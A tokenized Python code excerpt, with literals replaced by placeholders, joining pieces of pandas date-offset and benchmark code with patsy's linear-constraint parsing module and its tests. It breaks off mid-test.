<EOL> raise ValueError ( '<STR_LIT>' % offset ) <EOL> cur = next_date <EOL> prefix_mapping = dict ( ( offset . _prefix , offset ) for offset in [ <EOL> YearBegin , <EOL> YearEnd , <EOL> BYearBegin , <EOL> BYearEnd , <EOL> BusinessDay , <EOL> BusinessMonthBegin , <EOL> BusinessMonthEnd , <EOL> BQuarterEnd , <EOL> BQuarterBegin , <EOL> BusinessHour , <EOL> CustomBusinessDay , <EOL> CustomBusinessMonthEnd , <EOL> CustomBusinessMonthBegin , <EOL> CustomBusinessHour , <EOL> MonthEnd , <EOL> MonthBegin , <EOL> Week , <EOL> Second , <EOL> Minute , <EOL> Micro , <EOL> QuarterEnd , <EOL> QuarterBegin , <EOL> Milli , <EOL> Hour , <EOL> Day , <EOL> WeekOfMonth , <EOL> FY5253 , <EOL> FY5253Quarter , <EOL> ] ) <EOL> prefix_mapping [ '<STR_LIT:N>' ] = Nano </s>
<s> from pandas import * <EOL> from pandas . compat import range <EOL> try : <EOL> import pandas . core . internals as internals <EOL> reload ( internals ) <EOL> import pandas . core . frame as frame <EOL> reload ( frame ) <EOL> from pandas . core . frame import DataFrame as DataMatrix <EOL> except ImportError : <EOL> pass <EOL> N = <NUM_LIT:1000> <EOL> K = <NUM_LIT> <EOL> def horribly_unconsolidated ( ) : <EOL> index = np . arange ( N ) <EOL> df = DataMatrix ( index = index ) <EOL> for i in range ( K ) : <EOL> df [ i ] = float ( K ) <EOL> return df <EOL> def bench_reindex_index ( df , it = <NUM_LIT:100> ) : <EOL> new_idx = np . arange ( <NUM_LIT:0> , N , <NUM_LIT:2> ) <EOL> for i in range ( it ) : <EOL> df . reindex ( new_idx ) <EOL> def bench_reindex_columns ( df , it = <NUM_LIT:100> ) : <EOL> new_cols = np . arange ( <NUM_LIT:0> , K , <NUM_LIT:2> ) <EOL> for i in range ( it ) : <EOL> df . reindex ( columns = new_cols ) <EOL> def bench_join_index ( df , it = <NUM_LIT:10> ) : <EOL> left = df . reindex ( index = np . arange ( <NUM_LIT:0> , N , <NUM_LIT:2> ) , <EOL> columns = np . arange ( K // <NUM_LIT:2> ) ) <EOL> right = df . reindex ( columns = np . arange ( K // <NUM_LIT:2> + <NUM_LIT:1> , K ) ) <EOL> for i in range ( it ) : <EOL> joined = left . join ( right ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> df = horribly_unconsolidated ( ) <EOL> left = df . reindex ( index = np . arange ( <NUM_LIT:0> , N , <NUM_LIT:2> ) , <EOL> columns = np . arange ( K // <NUM_LIT:2> ) ) <EOL> right = df . reindex ( columns = np . arange ( K // <NUM_LIT:2> + <NUM_LIT:1> , K ) ) <EOL> bench_join_index ( df ) </s>
<s> from vbench . api import Benchmark <EOL> from datetime import datetime <EOL> common_setup = """<STR_LIT>""" <EOL> setup = common_setup + """<STR_LIT>""" <EOL> panel_shift = Benchmark ( '<STR_LIT>' , setup , <EOL> start_date = datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:12> ) ) <EOL> panel_shift_minor = Benchmark ( '<STR_LIT>' , setup , <EOL> start_date = datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:12> ) ) <EOL> panel_pct_change_major = Benchmark ( '<STR_LIT>' , setup , <EOL> start_date = datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT> ) ) <EOL> panel_pct_change_minor = Benchmark ( '<STR_LIT>' , setup , <EOL> start_date = datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT> ) ) <EOL> panel_pct_change_items = Benchmark ( '<STR_LIT>' , setup , <EOL> start_date = datetime ( <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT> ) ) </s>
<s> from __future__ import print_function <EOL> __all__ = [ "<STR_LIT>" ] <EOL> import re <EOL> import six <EOL> import numpy as np <EOL> from patsy import PatsyError <EOL> from patsy . origin import Origin <EOL> from patsy . util import ( atleast_2d_column_default , <EOL> repr_pretty_delegate , repr_pretty_impl , <EOL> SortAnythingKey , <EOL> no_pickling , assert_no_pickling ) <EOL> from patsy . infix_parser import Token , Operator , ParseNode , infix_parse <EOL> from patsy . compat import Scanner , Mapping <EOL> class LinearConstraint ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , variable_names , coefs , constants = None ) : <EOL> self . variable_names = list ( variable_names ) <EOL> self . coefs = np . atleast_2d ( np . asarray ( coefs , dtype = float ) ) <EOL> if constants is None : <EOL> constants = np . zeros ( self . coefs . shape [ <NUM_LIT:0> ] , dtype = float ) <EOL> constants = np . asarray ( constants , dtype = float ) <EOL> self . constants = atleast_2d_column_default ( constants ) <EOL> if self . constants . ndim != <NUM_LIT:2> or self . constants . shape [ <NUM_LIT:1> ] != <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if self . coefs . ndim != <NUM_LIT:2> or self . coefs . shape [ <NUM_LIT:1> ] != len ( variable_names ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if self . coefs . shape [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if self . coefs . shape [ <NUM_LIT:0> ] != self . constants . shape [ <NUM_LIT:0> ] : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if np . any ( np . all ( self . coefs == <NUM_LIT:0> , axis = <NUM_LIT:1> ) ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> __repr__ = repr_pretty_delegate <EOL> def _repr_pretty_ ( self , p , cycle ) : <EOL> assert not cycle <EOL> return repr_pretty_impl ( p , self , <EOL> [ self . variable_names , self . coefs , self . constants ] ) <EOL> __getstate__ = no_pickling <EOL> @ classmethod <EOL> def combine ( cls , constraints ) : <EOL> """<STR_LIT>""" <EOL> if not constraints : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> variable_names = constraints [ <NUM_LIT:0> ] . variable_names <EOL> for constraint in constraints : <EOL> if constraint . variable_names != variable_names : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> coefs = np . row_stack ( [ c . coefs for c in constraints ] ) <EOL> constants = np . row_stack ( [ c . constants for c in constraints ] ) <EOL> return cls ( variable_names , coefs , constants ) <EOL> def test_LinearConstraint ( ) : <EOL> from numpy . testing . utils import assert_equal <EOL> lc = LinearConstraint ( [ "<STR_LIT:foo>" , "<STR_LIT:bar>" ] , [ <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> assert lc . variable_names == [ "<STR_LIT:foo>" , "<STR_LIT:bar>" ] <EOL> assert_equal ( lc . coefs , [ [ <NUM_LIT:1> , <NUM_LIT:1> ] ] ) <EOL> assert_equal ( lc . constants , [ [ <NUM_LIT:0> ] ] ) <EOL> lc = LinearConstraint ( [ "<STR_LIT:foo>" , "<STR_LIT:bar>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:3> ] ] , [ <NUM_LIT:10> , <NUM_LIT:20> ] ) <EOL> assert_equal ( lc . coefs , [ [ <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:3> ] ] ) <EOL> assert_equal ( lc . constants , [ [ <NUM_LIT:10> ] , [ <NUM_LIT:20> ] ] ) <EOL> assert lc . coefs . dtype == np . dtype ( float ) <EOL> assert lc . constants . dtype == np . dtype ( float ) <EOL> from nose . tools import assert_raises <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:2> ] ] ) <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" ] , [ [ [ <NUM_LIT:1> ] ] ] ) <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:2> ] ] , [ <NUM_LIT:3> , <NUM_LIT:4> ] ) <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:2> ] ] , [ <NUM_LIT:3> , <NUM_LIT:4> ] ) <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" ] , [ [ <NUM_LIT:0> ] ] ) <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" ] , [ [ <NUM_LIT:1> ] ] , [ [ ] ] ) <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ ] ) <EOL> assert_raises ( ValueError , LinearConstraint , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , <EOL> np . zeros ( ( <NUM_LIT:0> , <NUM_LIT:2> ) ) ) <EOL> assert_no_pickling ( lc ) <EOL> def test_LinearConstraint_combine ( ) : <EOL> comb = LinearConstraint . combine ( [ LinearConstraint ( [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ) , <EOL> LinearConstraint ( [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> ] ) ] ) <EOL> assert comb . variable_names == [ "<STR_LIT:a>" , "<STR_LIT:b>" ] <EOL> from numpy . testing . utils import assert_equal <EOL> assert_equal ( comb . coefs , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] ) <EOL> assert_equal ( comb . constants , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] ] ) <EOL> from nose . tools import assert_raises <EOL> assert_raises ( ValueError , LinearConstraint . combine , [ ] ) <EOL> assert_raises ( ValueError , LinearConstraint . combine , <EOL> [ LinearConstraint ( [ "<STR_LIT:a>" ] , [ <NUM_LIT:1> ] ) , LinearConstraint ( [ "<STR_LIT:b>" ] , [ <NUM_LIT:1> ] ) ] ) <EOL> _ops = [ <EOL> Operator ( "<STR_LIT:U+002C>" , <NUM_LIT:2> , - <NUM_LIT:100> ) , <EOL> Operator ( "<STR_LIT:=>" , <NUM_LIT:2> , <NUM_LIT:0> ) , <EOL> Operator ( "<STR_LIT:+>" , <NUM_LIT:1> , <NUM_LIT:100> ) , <EOL> Operator ( "<STR_LIT:->" , <NUM_LIT:1> , <NUM_LIT:100> ) , <EOL> Operator ( "<STR_LIT:+>" , <NUM_LIT:2> , <NUM_LIT:100> ) , <EOL> Operator ( "<STR_LIT:->" , <NUM_LIT:2> , <NUM_LIT:100> ) , <EOL> Operator ( "<STR_LIT:*>" , <NUM_LIT:2> , <NUM_LIT:200> ) , <EOL> Operator ( "<STR_LIT:/>" , <NUM_LIT:2> , <NUM_LIT:200> ) , <EOL> ] <EOL> _atomic = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def _token_maker ( type , string ) : <EOL> def make_token ( scanner , token_string ) : <EOL> if type == "<STR_LIT>" : <EOL> actual_type = token_string <EOL> else : <EOL> actual_type = type <EOL> return Token ( actual_type , <EOL> Origin ( string , * scanner . match . span ( ) ) , <EOL> token_string ) <EOL> return make_token <EOL> def _tokenize_constraint ( string , variable_names ) : <EOL> lparen_re = r"<STR_LIT>" <EOL> rparen_re = r"<STR_LIT>" <EOL> op_re = "<STR_LIT:|>" . join ( [ re . escape ( op . token_type ) for op in _ops ] ) <EOL> num_re = r"<STR_LIT>" <EOL> whitespace_re = r"<STR_LIT>" <EOL> variable_names = sorted ( variable_names , key = len , reverse = True ) <EOL> variable_re = "<STR_LIT:|>" . join ( [ re . escape ( n ) for n in variable_names ] ) <EOL> lexicon = [ <EOL> ( lparen_re , _token_maker ( Token . LPAREN , string ) ) , <EOL> ( rparen_re , _token_maker ( Token . RPAREN , string ) ) , <EOL> ( op_re , _token_maker ( "<STR_LIT>" , string ) ) , <EOL> ( variable_re , _token_maker ( "<STR_LIT>" , string ) ) , <EOL> ( num_re , _token_maker ( "<STR_LIT>" , string ) ) , <EOL> ( whitespace_re , None ) , <EOL> ] <EOL> scanner = Scanner ( lexicon ) <EOL> tokens , leftover = scanner . scan ( string ) <EOL> if leftover : <EOL> offset = len ( string ) - len ( leftover ) <EOL> raise PatsyError ( "<STR_LIT>" , <EOL> Origin ( string , offset , offset + <NUM_LIT:1> ) ) <EOL> return tokens <EOL> def test__tokenize_constraint ( ) : <EOL> code = "<STR_LIT>" <EOL> tokens = _tokenize_constraint ( code , [ "<STR_LIT:a>" , "<STR_LIT:b>" , "<STR_LIT:q>" ] ) <EOL> expecteds = [ ( "<STR_LIT>" , <NUM_LIT:0> , <NUM_LIT:1> , "<STR_LIT:2>" ) , <EOL> ( "<STR_LIT:*>" , <NUM_LIT:2> , <NUM_LIT:3> , "<STR_LIT:*>" ) , <EOL> ( Token . LPAREN , <NUM_LIT:4> , <NUM_LIT:5> , "<STR_LIT:(>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:5> , <NUM_LIT:6> , "<STR_LIT:a>" ) , <EOL> ( "<STR_LIT:+>" , <NUM_LIT:7> , <NUM_LIT:8> , "<STR_LIT:+>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT:9> , <NUM_LIT:10> , "<STR_LIT:b>" ) , <EOL> ( Token . RPAREN , <NUM_LIT:10> , <NUM_LIT:11> , "<STR_LIT:)>" ) , <EOL> ( "<STR_LIT:=>" , <NUM_LIT:12> , <NUM_LIT> , "<STR_LIT:=>" ) , <EOL> ( "<STR_LIT>" , <NUM_LIT> , <NUM_LIT:15> , "<STR_LIT:q>" ) ] <EOL> for got , expected in zip ( tokens , expecteds ) : <EOL> assert isinstance ( got , Token ) <EOL> assert got . type == expected [ <NUM_LIT:0> ] <EOL> assert got . origin == Origin ( code , expected [ <NUM_LIT:1> ] , expected [ <NUM_LIT:2> ] ) <EOL> assert got . extra == expected [ <NUM_LIT:3> ] <EOL> from nose . tools import assert_raises <EOL> assert_raises ( PatsyError , _tokenize_constraint , "<STR_LIT>" , [ "<STR_LIT:b>" ] ) <EOL> _tokenize_constraint ( "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> for names in ( [ "<STR_LIT:a>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT:a>" ] ) : <EOL> tokens = _tokenize_constraint ( "<STR_LIT>" , names ) <EOL> assert len ( tokens ) == <NUM_LIT:3> <EOL> assert [ t . extra for t in tokens ] == [ "<STR_LIT:a>" , "<STR_LIT>" , "<STR_LIT:a>" ] <EOL> tokens = _tokenize_constraint ( "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> assert len ( tokens ) == <NUM_LIT:4> <EOL> assert [ t . type for t in tokens ] == [ "<STR_LIT>" , "<STR_LIT:*>" , "<STR_LIT>" , "<STR_LIT:U+002C>" ] <EOL> assert [ t . extra for t in tokens ] == [ "<STR_LIT:2>" , "<STR_LIT:*>" , "<STR_LIT>" , "<STR_LIT:U+002C>" ] <EOL> def parse_constraint ( string , variable_names ) : <EOL> return infix_parse ( _tokenize_constraint ( string , variable_names ) , <EOL> _ops , _atomic ) <EOL> class _EvalConstraint ( object ) : <EOL> def __init__ ( self , variable_names ) : <EOL> self . _variable_names = variable_names <EOL> self . _N = len ( variable_names ) <EOL> self . _dispatch = { <EOL> ( "<STR_LIT>" , <NUM_LIT:0> ) : self . _eval_variable , <EOL> ( "<STR_LIT>" , <NUM_LIT:0> ) : self . _eval_number , <EOL> ( "<STR_LIT:+>" , <NUM_LIT:1> ) : self . _eval_unary_plus , <EOL> ( "<STR_LIT:->" , <NUM_LIT:1> ) : self . _eval_unary_minus , <EOL> ( "<STR_LIT:+>" , <NUM_LIT:2> ) : self . _eval_binary_plus , <EOL> ( "<STR_LIT:->" , <NUM_LIT:2> ) : self . _eval_binary_minus , <EOL> ( "<STR_LIT:*>" , <NUM_LIT:2> ) : self . _eval_binary_multiply , <EOL> ( "<STR_LIT:/>" , <NUM_LIT:2> ) : self . _eval_binary_div , <EOL> ( "<STR_LIT:=>" , <NUM_LIT:2> ) : self . _eval_binary_eq , <EOL> ( "<STR_LIT:U+002C>" , <NUM_LIT:2> ) : self . _eval_binary_comma , <EOL> } <EOL> def is_constant ( self , coefs ) : <EOL> return np . all ( coefs [ : self . _N ] == <NUM_LIT:0> ) <EOL> def _eval_variable ( self , tree ) : <EOL> var = tree . token . extra <EOL> coefs = np . zeros ( ( self . _N + <NUM_LIT:1> , ) , dtype = float ) <EOL> coefs [ self . _variable_names . index ( var ) ] = <NUM_LIT:1> <EOL> return coefs <EOL> def _eval_number ( self , tree ) : <EOL> coefs = np . zeros ( ( self . _N + <NUM_LIT:1> , ) , dtype = float ) <EOL> coefs [ - <NUM_LIT:1> ] = float ( tree . token . extra ) <EOL> return coefs <EOL> def _eval_unary_plus ( self , tree ) : <EOL> return self . eval ( tree . args [ <NUM_LIT:0> ] ) <EOL> def _eval_unary_minus ( self , tree ) : <EOL> return - <NUM_LIT:1> * self . eval ( tree . args [ <NUM_LIT:0> ] ) <EOL> def _eval_binary_plus ( self , tree ) : <EOL> return self . eval ( tree . args [ <NUM_LIT:0> ] ) + self . eval ( tree . args [ <NUM_LIT:1> ] ) <EOL> def _eval_binary_minus ( self , tree ) : <EOL> return self . eval ( tree . args [ <NUM_LIT:0> ] ) - self . eval ( tree . args [ <NUM_LIT:1> ] ) <EOL> def _eval_binary_div ( self , tree ) : <EOL> left = self . eval ( tree . args [ <NUM_LIT:0> ] ) <EOL> right = self . eval ( tree . args [ <NUM_LIT:1> ] ) <EOL> if not self . is_constant ( right ) : <EOL> raise PatsyError ( "<STR_LIT>" <EOL> "<STR_LIT>" , tree . args [ <NUM_LIT:1> ] ) <EOL> return left / right [ - <NUM_LIT:1> ] <EOL> def _eval_binary_multiply ( self , tree ) : <EOL> left = self . eval ( tree . args [ <NUM_LIT:0> ] ) <EOL> right = self . eval ( tree . args [ <NUM_LIT:1> ] ) <EOL> if self . is_constant ( left ) : <EOL> return left [ - <NUM_LIT:1> ] * right <EOL> elif self . is_constant ( right ) : <EOL> return left * right [ - <NUM_LIT:1> ] <EOL> else : <EOL> raise PatsyError ( "<STR_LIT>" <EOL> "<STR_LIT>" , tree ) <EOL> def _eval_binary_eq ( self , tree ) : <EOL> args = list ( tree . args ) <EOL> constraints = [ ] <EOL> for i , arg in enumerate ( args ) : <EOL> if arg . type == "<STR_LIT:=>" : <EOL> constraints . append ( self . eval ( arg , constraint = True ) ) <EOL> args [ i ] = arg . args [ <NUM_LIT:1> - i ] <EOL> left = self . eval ( args [ <NUM_LIT:0> ] ) <EOL> right = self . eval ( args [ <NUM_LIT:1> ] ) <EOL> coefs = left [ : self . _N ] - right [ : self . _N ] <EOL> if np . all ( coefs == <NUM_LIT:0> ) : <EOL> raise PatsyError ( "<STR_LIT>" , tree ) <EOL> constant = - left [ - <NUM_LIT:1> ] + right [ - <NUM_LIT:1> ] <EOL> constraint = LinearConstraint ( self . _variable_names , coefs , constant ) <EOL> constraints . append ( constraint ) <EOL> return LinearConstraint . combine ( constraints ) <EOL> def _eval_binary_comma ( self , tree ) : <EOL> left = self . eval ( tree . args [ <NUM_LIT:0> ] , constraint = True ) <EOL> right = self . eval ( tree . args [ <NUM_LIT:1> ] , constraint = True ) <EOL> return LinearConstraint . combine ( [ left , right ] ) <EOL> def eval ( self , tree , constraint = False ) : <EOL> key = ( tree . type , len ( tree . args ) ) <EOL> assert key in self . _dispatch <EOL> val = self . _dispatch [ key ] ( tree ) <EOL> if constraint : <EOL> if isinstance ( val , LinearConstraint ) : <EOL> return val <EOL> else : <EOL> assert val . size == self . _N + <NUM_LIT:1> <EOL> if np . all ( val [ : self . _N ] == <NUM_LIT:0> ) : <EOL> raise PatsyError ( "<STR_LIT>" , <EOL> tree ) <EOL> return LinearConstraint ( self . _variable_names , <EOL> val [ : self . _N ] , <EOL> - val [ - <NUM_LIT:1> ] ) <EOL> else : <EOL> if isinstance ( val , LinearConstraint ) : <EOL> raise PatsyError ( "<STR_LIT>" , tree ) <EOL> return val <EOL> def linear_constraint ( constraint_like , variable_names ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( constraint_like , LinearConstraint ) : <EOL> if constraint_like . variable_names != variable_names : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( constraint_like . variable_names , <EOL> variable_names ) ) <EOL> return constraint_like <EOL> if isinstance ( constraint_like , Mapping ) : <EOL> coefs = np . zeros ( ( len ( constraint_like ) , len ( variable_names ) ) , <EOL> dtype = float ) <EOL> constants = np . zeros ( len ( constraint_like ) ) <EOL> used = set ( ) <EOL> for i , ( name , value ) in enumerate ( six . iteritems ( constraint_like ) ) : <EOL> if name in variable_names : <EOL> idx = variable_names . index ( name ) <EOL> elif isinstance ( name , six . integer_types ) : <EOL> idx = name <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> % ( name , ) ) <EOL> if idx in used : <EOL> raise ValueError ( "<STR_LIT>" <EOL> % ( variable_names [ idx ] , ) ) <EOL> used . add ( idx ) <EOL> coefs [ i , idx ] = <NUM_LIT:1> <EOL> constants [ i ] = value <EOL> return LinearConstraint ( variable_names , coefs , constants ) <EOL> if isinstance ( constraint_like , str ) : <EOL> constraint_like = [ constraint_like ] <EOL> if ( isinstance ( constraint_like , list ) <EOL> and constraint_like <EOL> and isinstance ( constraint_like [ <NUM_LIT:0> ] , str ) ) : <EOL> constraints = [ ] <EOL> for code in constraint_like : <EOL> if not isinstance ( code , str ) : <EOL> raise ValueError ( "<STR_LIT>" % ( code , ) ) <EOL> tree = parse_constraint ( code , variable_names ) <EOL> evaluator = _EvalConstraint ( variable_names ) <EOL> constraints . append ( evaluator . eval ( tree , constraint = True ) ) <EOL> return LinearConstraint . combine ( constraints ) <EOL> if isinstance ( constraint_like , tuple ) : <EOL> if len ( constraint_like ) != <NUM_LIT:2> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> coef , constants = constraint_like <EOL> return LinearConstraint ( variable_names , coef , constants ) <EOL> coefs = np . asarray ( constraint_like , dtype = float ) <EOL> return LinearConstraint ( variable_names , coefs ) <EOL> def _check_lincon ( input , varnames , coefs , constants ) : <EOL> from numpy . testing . utils import assert_equal <EOL> got = linear_constraint ( input , varnames ) <EOL> print ( "<STR_LIT>" , got ) <EOL> expected = LinearConstraint ( varnames , coefs , constants ) <EOL> print ( "<STR_LIT>" , expected ) <EOL> assert_equal ( got . variable_names , expected . variable_names ) <EOL> assert_equal ( got . coefs , expected . coefs ) <EOL> assert_equal ( got . constants , expected . constants ) <EOL> assert_equal ( got . coefs . dtype , np . dtype ( float ) ) <EOL> assert_equal ( got . constants . dtype , np . dtype ( float ) ) <EOL> def test_linear_constraint ( ) : <EOL> from nose . tools import assert_raises <EOL> from patsy . compat import OrderedDict <EOL> t = _check_lincon <EOL> t ( LinearConstraint ( [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ <NUM_LIT:2> , <NUM_LIT:3> ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:2> , <NUM_LIT:3> ] ] , [ [ <NUM_LIT:0> ] ] ) <EOL> assert_raises ( ValueError , linear_constraint , <EOL> LinearConstraint ( [ "<STR_LIT:b>" , "<STR_LIT:a>" ] , [ <NUM_LIT:2> , <NUM_LIT:3> ] ) , <EOL> [ "<STR_LIT:a>" , "<STR_LIT:b>" ] ) <EOL> t ( { "<STR_LIT:a>" : <NUM_LIT:2> } , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:2> ] ] ) <EOL> t ( OrderedDict ( [ ( "<STR_LIT:a>" , <NUM_LIT:2> ) , ( "<STR_LIT:b>" , <NUM_LIT:3> ) ] ) , <EOL> [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> t ( OrderedDict ( [ ( "<STR_LIT:a>" , <NUM_LIT:2> ) , ( "<STR_LIT:b>" , <NUM_LIT:3> ) ] ) , <EOL> [ "<STR_LIT:b>" , "<STR_LIT:a>" ] , [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> t ( { <NUM_LIT:0> : <NUM_LIT:2> } , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:2> ] ] ) <EOL> t ( OrderedDict ( [ ( <NUM_LIT:0> , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> t ( OrderedDict ( [ ( "<STR_LIT:a>" , <NUM_LIT:2> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) ] ) , <EOL> [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> assert_raises ( ValueError , linear_constraint , { "<STR_LIT:q>" : <NUM_LIT:1> } , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] ) <EOL> assert_raises ( ValueError , linear_constraint , { "<STR_LIT:a>" : <NUM_LIT:1> , <NUM_LIT:0> : <NUM_LIT:2> } , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] ) <EOL> t ( np . array ( [ <NUM_LIT:2> , <NUM_LIT:3> ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:2> , <NUM_LIT:3> ] ] , [ [ <NUM_LIT:0> ] ] ) <EOL> t ( np . array ( [ [ <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:4> , <NUM_LIT:5> ] ] ) , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:2> , <NUM_LIT:3> ] , [ <NUM_LIT:4> , <NUM_LIT:5> ] ] , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:0> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:2> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:2> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:2> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:3> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:3> ] , [ <NUM_LIT:2> ] ] ) <EOL> t ( [ "<STR_LIT>" , "<STR_LIT>" ] , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> assert_raises ( ValueError , linear_constraint , [ "<STR_LIT:a>" , { "<STR_LIT:b>" : <NUM_LIT:0> } ] , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , <EOL> [ [ <NUM_LIT:2> , <NUM_LIT> / <NUM_LIT:3> + <NUM_LIT:1> ] ] , [ [ <NUM_LIT:7> - <NUM_LIT> / <NUM_LIT:4> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ - <NUM_LIT:2> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:0> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:1> , - <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:1> ] ] , [ [ <NUM_LIT:0> ] , [ <NUM_LIT:2> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , <EOL> [ [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] , [ [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] ) <EOL> t ( "<STR_LIT>" , [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ [ <NUM_LIT:2> , <NUM_LIT:0> ] ] , [ [ 